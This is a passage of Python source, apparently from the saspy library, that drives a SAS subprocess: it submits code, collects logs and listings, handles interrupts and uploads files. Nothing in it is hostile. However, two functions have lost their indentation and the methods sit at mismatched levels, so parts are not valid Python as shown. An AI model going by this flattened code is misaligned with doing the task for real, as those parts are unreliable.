    # Windows pipes can't be read non-blocking, so dedicated reader threads
    # drain the subprocess's stdout/stderr into Queues (started in _startsas).
    if os.name == 'nt':
        def _read_out(self):
            # Runs until the subprocess closes its stdout (EOF -> b'').
            while True:
                lst = self.pid.stdout.read(4096)
                if lst == b'':
                    break
                self.stdout.put(lst)
        def _read_err(self):
            # Runs until the subprocess closes its stderr (EOF -> b'').
            while True:
                log = self.pid.stderr.read(4096)
                if log == b'':
                    break
                self.stderr.put(log)
    def _endsas(self):
        """Terminate the SAS subprocess: submit `endsas`, wait up to ~5
        seconds, then kill it if it hasn't exited."""
        rc = 0
        ret = None
        if self.pid:
            # The leading ";*';*";*/; guards close any open quotes/comments
            # in the SAS session so the quit/endsas is honored.
            code = b";*\';*\";*/;\n;quit;endsas;\n"
            self._getlog(wait=1)
            if self.pid:
                out = self.stdin.write(code)
                self.stdin.flush()
            #self._asubmit(code,'text')
            sleep(1)
            if self.pid:
                if os.name == 'nt':
                    pid = self.pid.pid
                    try:
                        rc = self.pid.wait(5)
                    except (subprocess.TimeoutExpired):
                        if self.sascfg.verbose:
                            print("SAS didn't shutdown w/in 5 seconds; killing it to be sure")
                        self.pid.kill()
                    # Let the reader threads drain and exit.
                    self.to.join(5)
                    self.te.join(5)
                else:
                    pid = self.pid
                    # Poll up to ~5 times for the child to exit on its own.
                    x = 5
                    while True:
                        rc = os.waitpid(self.pid, os.WNOHANG)
                        if rc[0] != 0:
                            break
                        x = x - 1
                        if x < 1:
                            break
                        sleep(1)
                    if rc[0] != 0:
                        pass
                    else:
                        if self.sascfg.verbose:
                            print("SAS didn't shutdown w/in 5 seconds; killing it to be sure")
                        os.kill(self.pid, signal.SIGKILL)
                if self.sascfg.verbose:
                    print("SAS Connection terminated. Subprocess id was "+str(pid))
            self.pid = None
            self._sb.SASpid = None
        return ret
    def _getlog(self, wait=5, jobid=None):
        """Drain the SAS log from stderr, waiting up to `wait` seconds.

        Returns the decoded log text, or an error string if the SAS process
        has terminated. Also appends to self._log and flags check_error_log
        when 'ERROR:' appears.
        """
        logf = b''
        quit = wait * 2  # polling at 0.5s granularity below
        logn = self._logcnt(False)
        # Marker line injected by submit(); strip it from the returned log.
        code1 = "%put E3969440A681A24088859985"+logn+";\nE3969440A681A24088859985"+logn
        # First liveness check: bail out early if SAS already died.
        if os.name == 'nt':
            try:
                rc = self.pid.wait(0)
                self.pid = None
                return 'SAS process has terminated unexpectedly. RC from wait was: '+str(rc)
            except:
                pass
        else:
            rc = os.waitpid(self.pid, os.WNOHANG)
            if rc[0] != 0:
                self.pid = None
                self._sb.SASpid = None
                return 'SAS process has terminated unexpectedly. Pid State= '+str(rc)
        while True:
            if os.name == 'nt':
                try:
                    log = self.stderr.get_nowait()
                except Empty:
                    log = b''
            else:
                log = self.stderr.read1(4096)
            if len(log) > 0:
                logf += log
            else:
                quit -= 1
                if quit < 0 or len(logf) > 0:
                    break
                sleep(0.5)
        x = logf.decode(self.sascfg.encoding, errors='replace').replace(code1, " ")
        self._log += x
        if x.count('ERROR:') > 0:
            warnings.warn("Noticed 'ERROR:' in LOG, you ought to take a look and see if there was a problem")
            self._sb.check_error_log = True
        if self.pid == None:
            self._sb.SASpid = None
            return "No SAS process attached. SAS process has terminated unexpectedly."
        # Second liveness check after reading, mirroring the one above.
        if os.name == 'nt':
            try:
                rc = self.pid.wait(0)
                self.pid = None
                return 'SAS process has terminated unexpectedly. RC from wait was: '+str(rc)
            except:
                pass
        else:
            rc = os.waitpid(self.pid, os.WNOHANG)
            if rc[0] != 0:
                self.pid = None
                self._sb.SASpid = None
                return 'SAS process has terminated unexpectedly. Pid State= '+str(rc)
        return x
def _getlst(self, wait=5, jobid=None):
    """Drain and return the HTML LST (listing) from the subprocess's stdout.

    wait  - polling budget used only before the opening <!DOCTYPE html> is
            seen; once a document has begun, the loop waits for </html>
    jobid - unused here; presumably kept for interface parity — TODO confirm

    Returns the decoded listing, or an error string if SAS has terminated.
    """
    lstf = b''
    quit = wait * 2     # poll countdown; NOTE: shadows builtin quit()
    eof  = 0            # count of trailing '</html>' markers found
    bof  = False        # True once '<!DOCTYPE html>' has been seen
    lenf = 0

    while True:
        if os.name == 'nt':
            try:
                lst = self.stdout.get_nowait()
            except Empty:
                lst = b''
        else:
            lst = self.stdout.read1(4096)
        if len(lst) > 0:
            lstf += lst
            # document start only ever appears in the first 20 bytes of a chunk
            if ((not bof) and lst.count(b"<!DOCTYPE html>", 0, 20) > 0):
                bof = True
        else:
            lenf = len(lstf)
            # look for the closing tag only in the tail of what we have
            if (lenf > 15):
                eof = lstf.count(b"</html>", (lenf - 15), lenf)
            if (eof > 0):
                break
            # only count down the budget before the document has started;
            # after bof we wait indefinitely for </html>
            if not bof:
                quit -= 1
                if quit < 0:
                    break
            sleep(0.5)

    if self.pid == None:
        self._sb.SASpid = None
        return "No SAS process attached. SAS process has terminated unexpectedly."

    if os.name == 'nt':
        try:
            rc = self.pid.wait(0)
            self.pid = None
            return 'SAS process has terminated unexpectedly. RC from wait was: '+str(rc)
        except:
            pass
    else:
        rc = os.waitpid(self.pid, os.WNOHANG)
        if rc[0] != 0:
            self.pid = None
            self._sb.SASpid = None
            return 'SAS process has terminated unexpectedly. Pid State= '+str(rc)

    # NOTE(review): a complete document decodes with the default (utf-8)
    # codec, an incomplete one with the session encoding — looks deliberate
    # but asymmetric; confirm before changing.
    if eof:
        return lstf.decode(errors='replace')
    else:
        return lstf.decode(self.sascfg.encoding, errors='replace')
def _getlsttxt(self, wait=5, jobid=None):
    """Drain and return the TEXT-format LST from the subprocess's stdout.

    Submits a sentinel step that prints 'Tom was here' to the listing, then
    reads stdout until that sentinel arrives; everything before it is the
    caller's listing output.

    wait  - NOTE(review): 'quit' is initialized from wait but never used, so
            this loop currently waits indefinitely for the sentinel
    jobid - unused here; presumably kept for interface parity — TODO confirm
    """
    f2   = [None]
    lstf = b''
    quit = wait * 2
    eof  = 0
    self._asubmit("data _null_;file print;put 'Tom was here';run;", "text")

    while True:
        if os.name == 'nt':
            try:
                lst = self.stdout.get_nowait()
            except Empty:
                lst = b''
        else:
            lst = self.stdout.read1(4096)
        if len(lst) > 0:
            lstf += lst
            lenf = len(lstf)
            # the sentinel can only be in the tail of the accumulated buffer
            eof = lstf.find(b"Tom was here", lenf - 25, lenf)
            if (eof != -1):
                final = lstf.partition(b"Tom was here")
                # drop the sentinel's own page (everything after the last form feed)
                f2 = final[0].decode(self.sascfg.encoding, errors='replace').rpartition(chr(12))
                break

    lst = f2[0]

    if self.pid == None:
        self._sb.SASpid = None
        return "No SAS process attached. SAS process has terminated unexpectedly."

    if os.name == 'nt':
        try:
            rc = self.pid.wait(0)
            self.pid = None
            return 'SAS process has terminated unexpectedly. RC from wait was: '+str(rc)
        except:
            pass
    else:
        rc = os.waitpid(self.pid, os.WNOHANG)
        if rc[0] != 0:
            self.pid = None
            self._sb.SASpid = None
            return 'SAS process has terminated unexpectedly. Pid State= '+str(rc)

    # normalize form feeds (page breaks) to newlines
    return lst.replace(chr(12), '\n')
def _asubmit(self, code, results="html"):
# as this is an _ method, it's not really to be used. Of note is that if this is used and if what it submitted generates
# anything to the lst, then unless _getlst[txt] is called, then next submit will happen to get the lst this wrote, plus
# what it generates. If the two are not of the same type (html, text) it could be problematic, beyond not being what was
# expected in the first place. __flushlst__() used to be used, but was never needed. Adding this note and removing the
# unnecessary read in submit as this can't happen in the current code.
odsopen = b"ods listing close;ods "+self.sascfg.output.encode()+ \
b" (id=saspy_internal) file=stdout options(bitmap_mode='inline') device=svg style="+self._sb.HTML_Style.encode()+ \
b"; ods graphics on / outputfmt=png;\n"
odsclose = b"ods "+self.sascfg.output.encode()+b" (id=saspy_internal) close;ods listing;\n"
ods = True;
if results.upper() != "HTML":
ods = False
if (ods):
self.stdin.write(odsopen)
out = self.stdin.write(code.encode(self.sascfg.encoding)+b'\n')
if (ods):
self.stdin.write(odsclose)
self.stdin.flush()
return str(out)
def submit(self, code: str, results: str ="html", prompt: dict = None, **kwargs) -> dict:
    '''
    This method is used to submit any SAS code. It returns the Log and Listing as a python dictionary.
    code    - the SAS statements you want to execute
    results - format of results, HTML is default, TEXT is the alternative
    prompt  - dict of names:flags to prompt for; create macro variables (used in submitted code), then keep or delete
              The keys are the names of the macro variables and the boolean flag is to either hide what you type and delete
              the macros, or show what you type and keep the macros (they will still be available later)
              for example (what you type for pw will not be displayed, user and dsname will):
              results = sas.submit(
                 """
                 libname tera teradata server=teracop1 user=&user pw=&pw;
                 proc print data=tera.&dsname (obs=10); run;
                 """ ,
                 prompt = {'user': False, 'pw': True, 'dsname': False}
                 )
    Returns - a Dict containing two keys:values, [LOG, LST]. LOG is text and LST is 'results' (HTML or TEXT)
    NOTE: to view HTML results in the ipykernel, issue: from IPython.display import HTML and use HTML() instead of print()
    i.e,: results = sas.submit("data a; x=1; run; proc print;run')
          print(results['LOG'])
          HTML(results['LST'])
    '''
    prompt  = prompt if prompt is not None else {}
    printto = kwargs.pop('undo', False)

    # ODS sandwich that captures the listing as HTML on stdout
    odsopen = b"ods listing close;ods "+self.sascfg.output.encode()+ \
              b" (id=saspy_internal) file=stdout options(bitmap_mode='inline') device=svg style="+self._sb.HTML_Style.encode()+ \
              b"; ods graphics on / outputfmt=png;\n"
    odsclose = b"ods "+self.sascfg.output.encode()+b" (id=saspy_internal) close;ods listing;\n"
    ods      = True
    mj       = b";*\';*\";*/;"      # "magic" statement: closes any dangling quote/comment in user code
    lstf     = b''
    logf     = b''
    bail     = False
    eof      = 5
    bc       = False
    done     = False
    logn     = self._logcnt()
    # unique end-of-submit marker; written lowercase and upcased by SAS so the
    # echo of the %put statement itself never matches logcodeo
    logcodei = "%put %upcase(e3969440a681a24088859985" + logn + ");"
    logcodeo = b"E3969440A681A24088859985" + logn.encode()
    pcodei   = ''
    pcodeiv  = ''
    pcodeo   = ''
    undo     = b'proc printto;run;\n' if printto else b''

    if self.pid == None:
        self._sb.SASpid = None
        print("No SAS process attached. SAS process has terminated unexpectedly.")
        return dict(LOG="No SAS process attached. SAS process has terminated unexpectedly.", LST='')

    if os.name == 'nt':
        try:
            rc = self.pid.wait(0)
            self.pid = None
            # BUGFIX: previously returned a bare str; callers index the result with ['LOG']
            return dict(LOG='SAS process has terminated unexpectedly. RC from wait was: '+str(rc), LST='')
        except:
            pass
    else:
        rc = os.waitpid(self.pid, os.WNOHANG)
        if rc[0] != 0:
            self.pid = None
            self._sb.SASpid = None
            return dict(LOG='SAS process has terminated unexpectedly. Pid State= '+str(rc), LST='')

    if results.upper() != "HTML":
        ods = False

    if len(prompt):
        # wrap prompted macro assignments so the values don't echo in the LOG
        pcodei += 'options nosource nonotes;\n'
        pcodeo += 'options nosource nonotes;\n'
        for key in prompt:
            gotit = False
            while not gotit:
                var = self.sascfg._prompt('Please enter value for macro variable '+key+' ', pw=prompt[key])
                if var is None:
                    raise RuntimeError("No value for prompted macro variable provided.")
                if len(var) > 0:
                    gotit = True
                else:
                    print("Sorry, didn't get a value for that variable.")
            if prompt[key]:
                # hidden value: delete the macro again afterwards
                pcodei += '%let '+key+'='+var+';\n'
                pcodeo += '%symdel '+key+';\n'
            else:
                pcodeiv += '%let '+key+'='+var+';\n'
        pcodei += 'options source notes;\n'
        pcodeo += 'options source notes;\n'

    if ods:
        self.stdin.write(odsopen)

    pgm  = mj+b'\n'+pcodei.encode(self.sascfg.encoding)+pcodeiv.encode(self.sascfg.encoding)
    pgm += code.encode(self.sascfg.encoding)+b'\n'+pcodeo.encode(self.sascfg.encoding)+b'\n'+mj
    out  = self.stdin.write(pgm)

    if ods:
        self.stdin.write(odsclose)

    out = self.stdin.write(undo+logcodei.encode(self.sascfg.encoding)+b'\n')
    self.stdin.flush()

    bof = False
    while not done:
        try:
            while True:
                # is the subprocess still alive?
                if os.name == 'nt':
                    try:
                        rc = self.pid.wait(0)
                        self.pid = None
                        # BUGFIX: return a dict, consistent with every other exit path
                        return dict(LOG='SAS process has terminated unexpectedly. RC from wait was: '+str(rc), LST='')
                    except:
                        pass
                else:
                    rc = os.waitpid(self.pid, os.WNOHANG)
                    if rc[0] != 0:
                        log = b''
                        try:
                            log = self.stderr.read1(4096)
                            if len(log) > 0:
                                logf += log
                            self._log += logf.decode(self.sascfg.encoding, errors='replace')
                        except:
                            pass
                        self.pid = None
                        self._sb.SASpid = None
                        return dict(LOG='SAS process has terminated unexpectedly. Pid State= ' +
                                    str(rc)+'\n'+logf.decode(self.sascfg.encoding, errors='replace'), LST='')

                # once the end marker was seen, drain a few more reads then stop
                if bail:
                    eof -= 1
                if eof < 0:
                    break

                if os.name == 'nt':
                    try:
                        lst = self.stdout.get_nowait()
                    except Empty:
                        lst = b''
                else:
                    lst = self.stdout.read1(4096)

                if len(lst) > 0:
                    lstf += lst
                    if ods and not bof and lstf.count(b"<!DOCTYPE html>", 0, 20) > 0:
                        bof = True
                else:
                    if os.name == 'nt':
                        try:
                            log = self.stderr.get_nowait()
                        except Empty:
                            log = b''
                    else:
                        log = self.stderr.read1(4096)
                    if len(log) > 0:
                        logf += log
                        if not bail and bc:
                            # an ignored break left the step open; close it out
                            self.stdin.write(undo+odsclose+logcodei.encode(self.sascfg.encoding)+b'\n')
                            self.stdin.flush()
                            bc = False
                        if not bail and logf.count(logcodeo) >= 1:
                            if ods:
                                # with ODS, also wait for the HTML document to finish
                                lenf = len(lstf)
                                if lenf > 20 and bof:
                                    if lstf.count(b"</html>", (lenf - 15), lenf):
                                        bail = True
                            else:
                                bail = True
            done = True

        except (ConnectionResetError):
            # the pipe to SAS was torn down mid-submit; salvage what LOG we can
            log = b''
            if os.name == 'nt':
                try:
                    log = self.stderr.get_nowait()
                except Empty:
                    log = b''
                # BUGFIX: the nt branch previously discarded this last read
                if len(log) > 0:
                    logf += log
                    self._log += logf.decode(self.sascfg.encoding, errors='replace')
            else:
                try:
                    log = self.stderr.read1(4096)
                    if len(log) > 0:
                        logf += log
                        self._log += logf.decode(self.sascfg.encoding, errors='replace')
                except:
                    pass
            rc = 0
            if os.name == 'nt':
                try:
                    rc = self.pid.wait(0)
                except:
                    pass
            else:
                rc = os.waitpid(self.pid, 0)
            self.pid = None
            self._sb.SASpid = None
            log = logf.partition(logcodeo)[0]+b'\nConnection Reset: SAS process has terminated unexpectedly. Pid State= '+str(rc).encode()+b'\n'+logf
            # BUGFIX: log is bytes here; the old code called .encode() on it,
            # which raised AttributeError instead of returning the LOG
            return dict(LOG=log.decode(self.sascfg.encoding, errors='replace'), LST='')

        except (KeyboardInterrupt, SystemExit):
            if not self._sb.sascfg.prompt:
                raise KeyboardInterrupt("Interupt handling is disabled due to prompting being disabled.")
            print('Exception caught!')
            ll = self._breakprompt(logcodeo)
            if ll.get('ABORT', False):
                return ll
            logf += ll['LOG']
            lstf += ll['LST']
            bc = ll['BC']
            if not bc:
                print('Exception handled :)\n')
            else:
                print('Exception ignored, continuing to process...\n')
                self.stdin.write(undo+odsclose+logcodei.encode(self.sascfg.encoding)+b'\n')
                self.stdin.flush()

    if ods:
        # try strict default decode first, then the session encoding, then replace
        try:
            lstf = lstf.decode()
        except UnicodeDecodeError:
            try:
                lstf = lstf.decode(self.sascfg.encoding)
            except UnicodeDecodeError:
                lstf = lstf.decode(errors='replace')
    else:
        lstf = lstf.decode(self.sascfg.encoding, errors='replace')

    logf = logf.decode(self.sascfg.encoding, errors='replace').replace(chr(12), chr(10))

    # an HTML listing with (almost) nothing after the last script block is empty output
    trip = lstf.rpartition("/*]]>*/")
    if len(trip[1]) > 0 and len(trip[2]) < 200:
        lstf = ''

    self._log += logf
    # carve this submit's LOG out from between the previous marker and ours
    final = logf.partition(logcodei)
    z     = final[0].rpartition(chr(10))
    prev  = '%08d' % (self._log_cnt - 1)
    zz    = z[0].rpartition("E3969440A681A24088859985" + prev)
    logd  = zz[2].replace(mj.decode(self.sascfg.encoding), '').replace(chr(12), chr(10))

    lstd = lstf.replace(chr(12), chr(10)).replace('<body class="c body">',
                                                  '<body class="l body">').replace("font-size: x-small;",
                                                                                   "font-size: normal;")
    if logd.count('ERROR:') > 0:
        warnings.warn("Noticed 'ERROR:' in LOG, you ought to take a look and see if there was a problem")
        self._sb.check_error_log = True

    self._sb._lastlog = logd
    return dict(LOG=logd, LST=lstd)
def _breakprompt(self, eos):
found = False
logf = b''
lstf = b''
bc = False
if self.pid is None:
self._sb.SASpid = None
return dict(LOG="No SAS process attached. SAS process has terminated unexpectedly.", LST='', ABORT=True)
if self.sascfg.ssh:
response = self.sascfg._prompt(
"SAS attention handling not supported over ssh. Please enter (T) to terminate SAS or (C) to continue.")
while True:
if response is None or response.upper() == 'C':
return dict(LOG=b'', LST=b'', BC=True)
if response.upper() == 'T':
break
response = self.sascfg._prompt("Please enter (T) to terminate SAS or (C) to continue.")
if os.name == 'nt':
self.pid.kill()
else:
interrupt = signal.SIGINT
os.kill(self.pid, interrupt)
sleep(.25)
while True:
if os.name == 'nt':
try:
rc = self.pid.wait(0)
except:
pass
self.pid = None
self._sb.SASpid = None
return dict(LOG='SAS process has terminated unexpectedly. RC from wait was: '+str(rc), LST='',ABORT=True)
else:
rc = os.waitpid(self.pid, os.WNOHANG)
if rc[0] != 0:
self.pid = None
self._sb.SASpid = None
outrc = str(rc)
return dict(LOG='SAS process has terminated unexpectedly. Pid State= '+outrc, LST='',ABORT=True)
lst = self.stdout.read1(4096)
lstf += lst
if len(lst) > 0:
lsts = lst.rpartition(b'Select:')
if lsts[0] != b'' and lsts[1] != b'':
found = True
query = lsts[1] + lsts[2].rsplit(b'\n?')[0] + b'\n'
print('Processing interrupt\nAttn handler Query is\n\n' + query.decode(self.sascfg.encoding, errors='replace'))
response = None
while response is None:
response = self.sascfg._prompt("Please enter your Response: ")
self.stdin.write(response.encode(self.sascfg.encoding) + b'\n')
self.stdin.flush()
if (response == 'C' or response == 'c') and query.count("C. Cancel") >= 1:
bc = True
break
else:
lsts = lst.rpartition(b'Press')
if lsts[0] != b'' and lsts[1] != b'':
query = lsts[1] + lsts[2].rsplit(b'\n?')[0] + b'\n'
print('Secondary Query is:\n\n' + query.decode(self.sascfg.encoding, errors='replace'))
response = None
while response is None:
response = self.sascfg._prompt("Please enter your Response: ")
self.stdin.write(response.encode(self.sascfg.encoding) + b'\n')
self.stdin.flush()
if (response == 'N' or response == 'n') and query.count("N to continue") >= 1:
bc = True
break
else:
print("******************No 'Select' or 'Press' found. Here's what was found.")
found = True
print('Processing interrupt\nAttn handler Query is\n\n' + lst.decode(self.sascfg.encoding, errors='replace'))
response = None
while response is None:
response = self.sascfg._prompt("Please enter your Response: or N/A only if there are no choices: ")
self.stdin.write(response.encode(self.sascfg.encoding) + b'\n')
self.stdin.flush()
if response in ['N/A', '']:
break
found = True
bc = True
else:
log = self.stderr.read1(4096)
logf += log
self._log += log.decode(self.sascfg.encoding, errors='replace')
if log.count(eos) >= 1:
print("******************Found end of step. No interrupt processed")
found = True
if found:
break
sleep(.25)
lstr = lstf
logr = logf
return dict(LOG=logr, LST=lstr, BC=bc)
def _break(self, inlst=''):
    """Automatic attention handler (older sibling of _breakprompt).

    inlst - any listing text already read when the interrupt occurred

    Sends SIGINT to the SAS subprocess and then answers SAS's attention
    dialog without user interaction, by scraping the 'Select:'/'Press' menus
    from the listing and choosing the option that cancels the submitted
    statements.

    Returns the last chunk of LOG text read (always assigned before the loop
    can break, since the break only occurs in the stderr branch).
    """
    found = False
    lst = inlst
    interupt = signal.SIGINT
    os.kill(self.pid, interupt)
    sleep(.25)
    # empty submit nudges SAS so the attention dialog shows up on stdout
    self._asubmit('','text')
    while True:
        if len(lst) > 0:
            lsts = lst.rpartition('Select:')
            if lsts[0] != '' and lsts[1] != '':
                found = True
                print('Processing interupt\nAttn handler Query is\n\n'+lsts[1]+lsts[2].rsplit('\n?')[0]+'\n')
                # pick the menu number of the cancel/halt choice, in order of preference;
                # the number is the token just before the '.' preceding the option text
                opt = lsts[2].partition('Cancel Submitted Statements')
                if opt[0] != '' and opt[1] != '':
                    response = opt[0].rpartition('.')[0].rpartition(' ')[2]
                else:
                    opt = lsts[2].partition('Halt DATA')
                    if opt[0] != '' and opt[1] != '':
                        response = opt[0].rpartition('.')[0].rpartition(' ')[2]
                    else:
                        opt = lsts[2].partition('Cancel the dialog')
                        if opt[0] != '' and opt[1] != '':
                            response = opt[0].rpartition('.')[0].rpartition(' ')[2]
                        else:
                            print("Unknown 'Select' choices found: ")
                            response = ''
                print("'Select' Response="+response+'\n')
                self._asubmit(response+'\n','text')
            else:
                lsts = lst.rpartition('Press')
                if lsts[0] != '' and lsts[1] != '':
                    print('Seconday Query is:\n\n'+lsts[1]+lsts[2].rsplit('\n?')[0]+'\n')
                    opt = lsts[2].partition(' to exit ')
                    if opt[0] != '' and opt[1] != '':
                        response = opt[0].rpartition(' ')[2]
                    else:
                        opt = lsts[2].partition('N to continue')
                        if opt[0] != '' and opt[1] != '':
                            response = 'Y'
                        else:
                            response = 'X'
                    print("'Press' Response="+response+'\n')
                    self._asubmit(response+'\n','text')
                else:
                    #print("******************No 'Select' or 'Press' found in lst=")
                    pass
            sleep(.25)
            lst = self.stdout.read1(4096).decode(self.sascfg.encoding, errors='replace')
        else:
            log = self.stderr.read1(4096).decode(self.sascfg.encoding, errors='replace')
            self._log += log
            logn = self._logcnt(False)
            # the %put marker from the last submit signals the step has ended
            if log.count("E3969440A681A24088859985"+logn+"\n") >= 1:
                print("******************Found end of step. No interupt processed")
                found = True
            if found:
                # restore normal ODS state before returning control
                ll = self.submit("ods "+self.sascfg.output+" (id=saspy_internal) close;ods listing close;ods listing;libname work list;\n",'text')
                break
            sleep(.25)
            lst = self.stdout.read1(4096).decode(self.sascfg.encoding, errors='replace')
    return log
def saslog(self):
    """Return the complete SAS LOG accumulated for this session so far."""
    return self._log
def exist(self, table: str, libref: str ="") -> bool:
    """
    table  - the name of the SAS Data Set
    libref - the libref for the Data Set, defaults to WORK, or USER if assigned
    Returns True if the Data Set (or a VIEW of that name) exists, else False.
    """
    # name-literal form handles mixed case / special chars in the member name
    target = "'" + table.strip() + "'n"
    if len(libref):
        target = libref + "." + target

    # one DATA _NULL_ step checks both the table and a view of the same name
    code = ('data _null_; e = exist("' + target + '");\n'
            'v = exist("' + target + '", \'VIEW\');\n if e or v then e = 1;\n'
            "put 'TABLE_EXISTS=' e 'TAB_EXTEND=';run;")

    ll = self.submit(code, "text")

    # parse the flag back out of the LOG between the two markers
    exists = int(ll['LOG'].rpartition("TABLE_EXISTS=")[2].rpartition(" TAB_EXTEND=")[0])
    return bool(exists)
def read_csv(self, file: str, table: str, libref: str ="", nosub: bool =False, opts: dict = None) -> '<SASdata object>':
    """
    This method will import a csv file into a SAS Data Set and return the SASdata object referring to it.
    file   - either the OS filesystem path of the file, or HTTP://... for a url accessible file
    table  - the name of the SAS Data Set to create
    libref - the libref for the SAS Data Set being created. Defaults to WORK, or USER if assigned
    nosub  - when True, just print the generated SAS code instead of running it
    opts   - a dictionary containing any of the following Proc Import options(datarow, delimiter, getnames, guessingrows)
    """
    if opts is None:
        opts = {}

    # remote URLs need the 'url' keyword on the filename statement
    url_kw = "url " if file.lower().startswith("http") else ""
    out_ds = (libref + "." if len(libref) else "") + "'" + table.strip() + "'n"

    code = ('filename x ' + url_kw + '"' + file + '";\n'
            'proc import datafile=x out=' + out_ds +
            " dbms=csv replace; " + self._sb._impopts(opts) + " run;")

    if nosub:
        print(code)
    else:
        self.submit(code, "text")
def write_csv(self, file: str, table: str, libref: str ="", nosub: bool =False, dsopts: dict = None, opts: dict = None) -> 'The LOG showing the results of the step':
    """
    This method will export a SAS Data Set to a file in CSV format.
    file   - the OS filesystem path of the file to be created (exported from the SAS Data Set)
    table  - the name of the SAS Data Set you want to export to a CSV file
    libref - the libref for the SAS Data Set.
    nosub  - when True, just print the generated SAS code instead of running it
    dsopts - a dictionary containing any of the following SAS data set options(where, drop, keep, obs, firstobs)
    opts   - a dictionary containing any of the following Proc Export options(delimiter, putnames)
    """
    if dsopts is None:
        dsopts = {}
    if opts is None:
        opts = {}

    in_ds = (libref + "." if len(libref) else "") + "'" + table.strip() + "'n"

    # nosource/source keeps the generated boilerplate out of the LOG
    code = ('filename x "' + file + '";\n'
            "options nosource;\n"
            "proc export data=" + in_ds + " " + self._sb._dsopts(dsopts) +
            " outfile=x dbms=csv replace;\n" +
            self._sb._expopts(opts) + " run;\n"
            "options source;\n")

    if nosub:
        print(code)
    else:
        ll = self.submit(code, "text")
        return ll['LOG']
def upload_slow(self, localfile: str, remotefile: str, overwrite: bool = True, permission: str = '', **kwargs):
    """
    This method uploads a local file to the SAS servers file system.
    localfile  - path to the local file to upload
    remotefile - path to remote file to create or overwrite
    overwrite  - overwrite the output file if it exists?
    permission - permissions to set on the new file. See SAS Filename Statement Doc for syntax

    Streams the file as hex-encoded datalines through SAS's stdin; SAS decodes
    them back to binary ('slow' relative to the socket-based upload()).
    Returns a dict with Success (bool) and LOG (str).
    """
    valid = self._sb.file_info(remotefile, quiet = True)
    if valid is None:
        # target doesn't exist; use the path as given
        remf = remotefile
    else:
        if valid == {}:
            # target is a directory; append the local file's basename
            remf = remotefile + self._sb.hostsep + localfile.rpartition(os.sep)[2]
        else:
            remf = remotefile
            if overwrite == False:
                return {'Success' : False,
                        'LOG'     : "File "+str(remotefile)+" exists and overwrite was set to False. Upload was stopped."}

    try:
        fd = open(localfile, 'rb')
    except OSError as e:
        return {'Success' : False,
                'LOG'     : "File "+str(localfile)+" could not be opened. Error was: "+str(e)}

    # DATA step reads hex datalines and writes the decoded bytes to the target file
    code = """
filename saspydir '"""+remf+"""' recfm=F encoding=binary lrecl=1 permission='"""+permission+"""';
data _null_;
file saspydir;
infile datalines;
input;
lin = length(_infile_);
outdata = inputc(_infile_, '$hex.', lin);
lout = lin/2;
put outdata $varying80. lout;
datalines4;"""

    buf = fd.read1(40)
    if len(buf):
        self._asubmit(code, "text")
    else:
        # zero-length file: just create (truncate) the target via fopen/fclose
        code = """
filename saspydir '"""+remf+"""' recfm=F encoding=binary lrecl=1 permission='"""+permission+"""';
data _null_;
fid = fopen('saspydir', 'O');
if fid then
rc = fclose(fid);
run;\n"""
        ll = self.submit(code, 'text')
        fd.close()
        return {'Success' : True,
                'LOG'     : ll['LOG']}

    # send the file 40 bytes at a time, hex-encoded, one dataline per chunk
    while len(buf):
        buf2 = ''
        for i in range(len(buf)):
            buf2 += '%02x' % buf[i]
        self.stdin.write(buf2.encode()+b'\n')
        buf = fd.read1(40)

    # ';;;;' terminates the datalines4 block
    self._asubmit(";;;;", "text")
    ll = self.submit("run;\nfilename saspydir;", 'text')
    fd.close()
    return {'Success' : True,
            'LOG'     : ll['LOG']}
def upload(self, localfile: str, remotefile: str, overwrite: bool = True, permission: str = '', **kwargs):
    """
    This method uploads a local file to the SAS servers file system.
    localfile  - path to the local file to upload
    remotefile - path to remote file to create or overwrite
    overwrite  - overwrite the output file if it exists?
    permission - permissions to set on the new file. See SAS Filename Statement Doc for syntax

    This variant handles the ssh + reverse-tunnel case (SAS opens a server
    socket we connect to through the tunnel); every other configuration is
    delegated to _upload_client(). Returns a dict with Success and LOG.
    """
    valid = self._sb.file_info(remotefile, quiet = True)
    if valid is None:
        remf = remotefile
    else:
        if valid == {}:
            # remote path is a directory; append the local basename
            remf = remotefile + self._sb.hostsep + localfile.rpartition(os.sep)[2]
        else:
            remf = remotefile
            if overwrite == False:
                return {'Success' : False,
                        'LOG'     : "File "+str(remotefile)+" exists and overwrite was set to False. Upload was stopped."}

    port = kwargs.get('port', 0)

    if self.sascfg.ssh and self.sascfg.rtunnel and port == 0:
        # we are using a rtunnel; default to that port
        # NOTE(review): an explicitly passed port also takes the client path — confirm intended
        port = self.sascfg.rtunnel
        host = 'localhost'
    else:
        return self._upload_client(localfile, remotefile, overwrite, permission, **kwargs)

    try:
        fd = open(localfile, 'rb')
    except OSError as e:
        return {'Success' : False,
                'LOG'     : "File "+str(localfile)+" could not be opened. Error was: "+str(e)}

    # SAS side: listen on the (tunneled) socket and copy everything received to the file
    code = """
filename saspydir '"""+remf+"""' recfm=F encoding=binary lrecl=1 permission='"""+permission+"""';
filename sock socket ':"""+str(port)+"""' server reconn=0 recfm=S lrecl=4096;
data _null_; nb = -1;
infile sock nbyte=nb;
file saspydir;
input;
put _infile_;
run;
filename saspydir;
filename sock;\n"""

    self._asubmit(code, "text")

    sock = socks.socket()
    sock.connect((host, port))

    done = False
    while not done:
        try:
            while True:
                buf  = fd.read1(4096)
                sent = 0
                send = len(buf)
                blen = send
                if blen:
                    while send:
                        try:
                            sent = 0
                            sent = sock.send(buf[blen-send:blen])
                        except (BlockingIOError):
                            pass     # non-blocking send not ready; retry
                        except (OSError):
                            # connection dropped: reconnect, reopen the file and
                            # restart the transfer from the beginning
                            sock.close()
                            fd.close()
                            sock = socks.socket()
                            sock.connect((host, port))
                            fd = open(localfile, 'rb')
                            sleep(.5)
                            break
                        send -= sent
                else:
                    # EOF on the local file: shut the socket so SAS sees end of data
                    done = True
                    sock.shutdown(socks.SHUT_RDWR)
                    sock.close()
                    fd.close()
                    break
        except (KeyboardInterrupt, Exception) as e:
            sock.close()
            fd.close()
            ll = self.submit("", 'text')
            # NOTE(review): message says 'Download' in an upload path — likely copy/paste
            return {'Success' : False,
                    'LOG'     : "Download was interupted. Returning the SAS log:\n\n"+str(e)+"\n\n"+ll['LOG']}

    # empty submit collects the LOG produced by the DATA step above
    ll = self.submit("", 'text')
    return {'Success' : True,
            'LOG'     : ll['LOG']}
def _upload_client(self, localfile: str, remotefile: str, overwrite: bool = True, permission: str = '', **kwargs):
    """
    This method uploads a local file to the SAS servers file system.
    localfile  - path to the local file to upload
    remotefile - path to remote file to create or overwrite
